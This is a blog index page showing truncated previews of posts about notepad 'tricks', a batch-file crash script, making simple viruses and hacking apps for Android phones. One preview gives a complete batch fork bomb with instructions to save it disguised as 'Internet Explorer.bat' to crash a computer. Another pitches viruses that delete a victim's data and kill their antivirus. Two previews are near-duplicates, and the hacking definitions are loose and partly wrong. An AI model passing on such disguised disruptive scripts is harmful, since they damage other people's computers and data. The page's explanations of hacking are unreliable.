Posts

cool projects to do with notepad

Some cool projects to do with notpad . Oscar muya. One of the first things that one learns while learning to use a computer is an application called notepad. Almost everyone knows what notepad is, and despite being a simple looking and functioning application what kind of a power it actually possesses. One can literally destroy someone’s PC using a notepad, one can also solve big problems using notepad. Ok, notepad does not do all that I said on its own, but still. It is the platform where one can write the initial code that can then be compiled and stuff. So, learning a few small notepad tricks won’t really hurt our chances of showing off or maybe getting a different prospective about what notepad can really do. So, here are some cool Notepad Tricks you should try: 1. Continually Pop Out CD Drive Using Notepad Don’t you think it would be fun if you could play with your friend by making his cd-drive pop again and again? Just enter the text below into notepad and s...

cool projects to do with notepad

Some cool projects to do with notpad . One of the first things that one learns while learning to use a computer is an application called notepad. Almost everyone knows what notepad is, and despite being a simple looking and functioning application what kind of a power it actually possesses. One can literally destroy someone’s PC using a notepad, one can also solve big problems using notepad. Ok, notepad does not do all that I said on its own, but still. It is the platform where one can write the initial code that can then be compiled and stuff. So, learning a few small notepad tricks won’t really hurt our chances of showing off or maybe getting a different prospective about what notepad can really do. So, here are some cool Notepad Tricks you should try: 1. Continually Pop Out CD Drive Using Notepad. Don’t you think it would be fun if you could play with your friend by making his cd-drive pop again and again? Just enter the text below into notepad and save it as a .vbs file...

Make a simple Notepad project

Make a simple notepad project Oscar muya Here is how you do a cool little hack with notepad. What it does is pops up a command prompts and overloads the computer and the computer CRASHES!!! FOR EDUCATIONAL PURPOSES ONLY!!!!!!! Step 1: NotePad First you need to open Notepad. You can go to the start menu and Click "All Programs", Then find the Folder "Accessories" and "Notepad" should be in that folder. Or you can open the start menu and type "Notepad" and click enter and Notepad will open. Step 2: The Typing Part Type in Notepad- @echo off :a Start Start Start Start Start Start goto :a What this will do is Open CMD six times and then repeat itself. Over and Over. You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!! Step 3 : Saving When you save, Go to "File", "Save As", and save it as "Internet Explorer.bat". Where it says "FileType" Select "All Files" or it wont work!!! Mak...

How to create computer viruses

Know how to create simple Viruses By now you should have a pretty good grip on working with batch files .The time has come for you to fly out of the nest. Presented below are a few ideas for things that you can make your viruses do. These commands should work on most Windows 10 systems with default configuration. However, you may need to tweak some of them before they work for you. For example, to kill your victim’s anti-virus, you’ll need to know what anti-virus they have in the first place, only then can you stop it’s process and delete it. Warning : Executing some of these commands WILL result in permanent loss of data. If you want to try these out, do so in a virtual device. Delete important stuff. Damaging personal data is a purely destructive attack motive. The attacker gains nothing but the victim loses something. For better or worse, this is something that batch files really shine at. Batch files can quietly delete vast quantities of data without the victim ev...

Apps for hacking an android phone

What is hacking and who is a hacker? Hacking is the process of technically manipulating the normal behavior of a computer or its network. It is a clever way to get into the confidential computer programs or software and change its system in a constructive way. Hacking has been refining the computer world since more than 40 years and the first ever computer was hacked at MIT. A hacker is a person who is involved in hacking and can operate the internal computer network is cannot be accessed by anyone except the authorized person. Types of hacking Website hacking: taki ng control over the role of the website administrator who owns the site. Ethical hacking : Finding the major flaws in the system and patching them. Network hacking: Collecting information on the the domain by utilizing tools like Ping, UP, Tracert, and Netstat. Email hacking: Illegally getting into the email of the concerned person to access all mails and confidential messages. Password hacking: Cracking the process...